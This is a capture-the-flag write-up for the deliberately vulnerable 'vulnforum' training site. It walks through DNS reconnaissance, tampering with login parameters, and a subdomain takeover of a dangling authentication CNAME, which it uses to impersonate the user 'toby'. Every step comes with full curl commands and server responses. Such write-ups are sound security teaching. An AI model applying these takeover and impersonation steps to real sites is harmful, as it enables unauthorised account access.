Vulnforum

DNS Recon

❯ nslookup -type=any vulnforum.co.uk 8.8.8.8
Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnforum.co.uk
Address: 68.183.255.206
vulnforum.co.uk	nameserver = ns1.digitalocean.com.
vulnforum.co.uk	nameserver = ns2.digitalocean.com.
vulnforum.co.uk	nameserver = ns3.digitalocean.com.
vulnforum.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnforum.co.uk
	serial = 1626253208
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800

Authoritative answers can be found from:

❯ dnsrecon -d vulnforum.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnforum.co.uk
[*] 	 A www.vulnforum.co.uk 68.183.255.206
[+] 1 Records Found

Visual Recon - Browsing the Page

Findings

User Profile: http://www.vulnforum.co.uk/user/1ac9c036aaf12a755084dc6a326ed7f5
User Names: toby
User UUID: 1ac9c036aaf12a755084dc6a326ed7f5
Login Page: http://www.vulnforum.co.uk/login

We open our browsers dev console and try to login using some credentials. It doesn't work but we copy the login also curl command to check it out. Change --data-raw 'username=toby&password=toby&method=local' to --data-raw 'username=toby&password=toby&method=remote'

❯ curl 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby&method=remote' \
  --compressed \
  --insecure
{"display_msg":"Server Error","technical_msg":"Server \"http:\/\/nqorl3vm.auth.vulnforum.co.uk\/auth\" responded with a 404 error","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

We've got the first flag and an interesting URL: http://nqorl3vm.auth.vulnforum.co.uk/auth

DNS Recon - Part 2

Let's check our new domain

❯ dnsrecon -d nqorl3vm.auth.vulnforum.co.uk
[*] Performing General Enumeration of Domain: nqorl3vm.auth.vulnforum.co.uk
[!] Wildcard resolution is enabled on this domain
[!] It is resolving to vulnauth.co.uk
[!] All queries will resolve to this address!!
[-] All nameservers failed to answer the DNSSEC query for nqorl3vm.auth.vulnforum.co.uk
[*] 	 SOA ns1.digitalocean.com 173.245.58.51
[*] 	 NS ns1.digitalocean.com 173.245.58.51
[*] 	 Bind Version for 173.245.58.51 b'Salt-master'
[*] 	 NS ns1.digitalocean.com 2400:cb00:2049:1::adf5:3a33
[*] 	 NS ns3.digitalocean.com 198.41.222.173
[*] 	 Bind Version for 198.41.222.173 b'Salt-master'
[*] 	 NS ns3.digitalocean.com 2400:cb00:2049:1::c629:dead
[*] 	 NS ns2.digitalocean.com 173.245.59.41
[*] 	 Bind Version for 173.245.59.41 b'Salt-master'
[*] 	 NS ns2.digitalocean.com 2400:cb00:2049:1::adf5:3b29
[-] Could not Resolve MX Records for nqorl3vm.auth.vulnforum.co.uk
[*] 	 CNAME nqorl3vm.auth.vulnforum.co.uk vulnauth.co.uk
[*] 	 A vulnauth.co.uk 68.183.255.206
[*] Enumerating SRV Records
[-] No SRV Records Found for nqorl3vm.auth.vulnforum.co.uk
[+] 0 Records Found

We found yet another new domain: vulnauth.co.uk Let's verify if it's live

❯ curl -L -ik -H "Cookie: ctfchallenge=CENSORED" http://vulnauth.co.uk
HTTP/1.1 200 OK
server: nginx/1.21.1
date: Fri, 13 May 2022 14:16:44 GMT
content-type: text/html; charset=UTF-8
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnauth.co.uk
transfer-encoding: chunked

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>VulnAuth - Authorisation Provider</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">

    <div style="text-align: center">
        <h1>VulnAuth</h1>
        <h4>User Authentication</h4>
        <img src="/images/logo.jpg">
    </div>

    <div class="row" style="margin-top:20px">

        <div class="col-md-5 col-md-offset-1">
            <h3>What is VulnAuth?</h3>
            <p>VulnAuth is a whitelabel solution to all your user authentication needs.</p>
            <p>We handle your user logins to you don't need to store any passwords on your systems.</p>
            <p>You can even use your existing domain name just by setting up a CNAME record to vulnauth.co.uk for example <strong>auth.yourdomain.com</strong></p>
            <p><strong>[^FLAG^A959EBEC1D9A02A456FC5BCCF7BA8D91^FLAG^]</strong></p>	
	</div>

We found another flag!

Subdomain Takeover

We previously found http://nqorl3vm.auth.vulnforum.co.uk/auth which tells us "Invalid Domain" when visiting the page. With the infos we gathered in our previous step it's a good idea to try to register that domain :)

Visit: http://vulnauth.co.uk/ and create an account

Auth Domain: nqorl3vm.auth.vulnforum.co.uk
E-Mail Address: [email protected]
Password: toby123

Visit: http://nqorl3vm.auth.vulnforum.co.uk (You should be greeted with a login page) Create a new User using the UUID we've discovered previously (1ac9c036aaf12a755084dc6a326ed7f5)

Username: toby
UUID: 1ac9c036aaf12a755084dc6a326ed7f5
Password: toby123

Let's try to login using curl

❯ curl -ik -L 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby123&method=remote' \
  --compressed \
  --insecure
HTTP/1.1 201 Created
server: nginx/1.21.1
date: Fri, 13 May 2022 14:10:48 GMT
content-type: application/json
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnforum.co.uk
set-cookie: token=NmNiMGJkOTNiY2JkNmIxYzQ1YjRlYjIwMGViNWQzYzZiN2UwZDQ4NGQyM2U5ZGZhNTFkYzY3MDI2ZDllNDdmYTdlNjJhMTExNzcyYTVkYjBkMjc2MDhmNGMxZDJjOTk1OGU0NmRhNGFkOGFiZTU4M2FkMDAzNzNiNWVjNDVjMWE%3D; expires=Fri, 13-May-2022 15:10:48 GMT; Max-Age=3600; path=/
transfer-encoding: chunked

{"display_msg":"Login Successful","technical_msg":"","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

Great it worked!

Visual Recon - Browsing the Page - As User: Toby

Unfortunately we aren't able to login on the webpage itself due to the "method=local" that is hardcoded. Lets use the cookie we've generated earlier and import it in our browser

Great! We're logged in as toby and find another flag [^FLAG^3B1A170C3033B788FEB1B1A4E45D62CD^FLAG^]

Findings

Post: http://www.vulnforum.co.uk/2/2 => Toby implemented a password reset function
User Profile: http://www.vulnforum.co.uk/user/76887c0378ba2b80f17422fb0c0791c4
User Names: john => Aadmin
User UUID: 76887c0378ba2b80f17422fb0c0791c4

Visit: http://www.vulnforum.co.uk/settings We're resetting the password to toby123 and now are able to login without any problems.

Last updated 2 years ago

DNS Recon

Visual Recon - Browsing the Page

Playing with Login Parameters

DNS Recon - Part 2

Subdomain Takeover

Visual Recon - Browsing the Page - As User: Toby